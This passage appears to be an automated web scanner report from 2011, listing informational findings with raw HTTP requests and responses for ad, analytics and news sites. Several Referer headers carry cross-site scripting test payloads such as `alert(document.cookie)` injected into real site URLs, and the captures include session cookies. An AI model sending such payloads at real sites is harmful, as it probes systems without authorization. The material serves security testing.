GET /visitor/addons/deploy.asp HTTP/1.1
Host: base.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickSiteContainerID_5296924=Secondary1;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 28 Jan 2011 14:11:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRSRACD=JNCEGDPBHJJHHAPHDMHAOKLH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

27.45. https://base.liveperson.net/hcp/html/blankhtml.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hcp/html/blankhtml.html

Request

Response

27.46. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Request

Response

27.47. http://boston30.autochooser.com/results.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Request

Response

27.48. http://br.imlive.com/NaN/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/NaN/

Request

GET /NaN/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 63

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

27.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

27.50. http://c.brightcove.com/services/messagebroker/amf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 29 Jan 2011 05:23:04 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

27.51. http://cafr.imlive.com/NaN/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/NaN/

Request

GET /NaN/ HTTP/1.1
Host: cafr.imlive.com
Proxy-Connection: keep-alive
Referer: http://cafr.imlive.com/?b38ec'-alert(document.cookie)-'84ce48297e3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257

Response

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 15:07:52 GMT
Connection: close
Content-Length: 63

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

27.52. http://common.onset.freedom.com/fi/adsense/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/fi/adsense/

Request

Response

27.53. http://common.onset.freedom.com/fi/analytics/cms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/fi/analytics/cms/

Request

GET /fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather&ghier=weather&us=anonymous HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:38:14 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n20 ( iad-agg-n28), ht-d iad-agg-n28.panthercdn.com
Cache-Control: max-age=7200
Expires: Sat, 29 Jan 2011 14:59:19 GMT
Age: 2336
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28654

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...

27.54. http://common.onset.freedom.com/oas/jx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/oas/jx/

Request

GET /oas/jx/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n12), rf-ms iad-agg-n12 ( sfo-agg-n5), rf-ms sfo-agg-n5 ( origin>CONN)
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 05:35:13 GMT
Age: 0
Content-Length: 165
Content-Type: text/html
Connection: close

<html>
<head>
<title></title>
</head>
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px;">
</body>
</html>

27.55. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0:0; FFcat=1220,167,14:1220,101,9

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Dec 2010 05:56:24 GMT
ETag: "7e199511-8cf-4989a587fd200"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 2312460743 2312452128
Cache-Control: max-age=226046
Expires: Mon, 31 Jan 2011 07:29:10 GMT
Date: Fri, 28 Jan 2011 16:41:44 GMT
Connection: close
Content-Length: 2255


<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

27.56. http://dm.de.mookie1.com/2/B3DM/2010DM/11076249577@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11076249577@x23

Request

GET /2/B3DM/2010DM/11076249577@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296271345

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.57. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Request

Response

27.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2457
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.59. http://dm.de.mookie1.com/2/B3DM/2010DM/11326230958@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11326230958@x23

Request

GET /2/B3DM/2010DM/11326230958@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269957

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.60. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11370845975@x23

Request

Response

27.61. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:26:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.62. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:36:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.63. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Request

Response

27.64. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11624211567@x23

Request

Response

27.65. http://dm.de.mookie1.com/2/B3DM/2010DM/11681620464@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11681620464@x23

Request

GET /2/B3DM/2010DM/11681620464@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.66. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.67. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.68. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Request

Response

27.69. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.70. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11819507567@x23

Request

GET /2/B3DM/2010DM/11819507567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
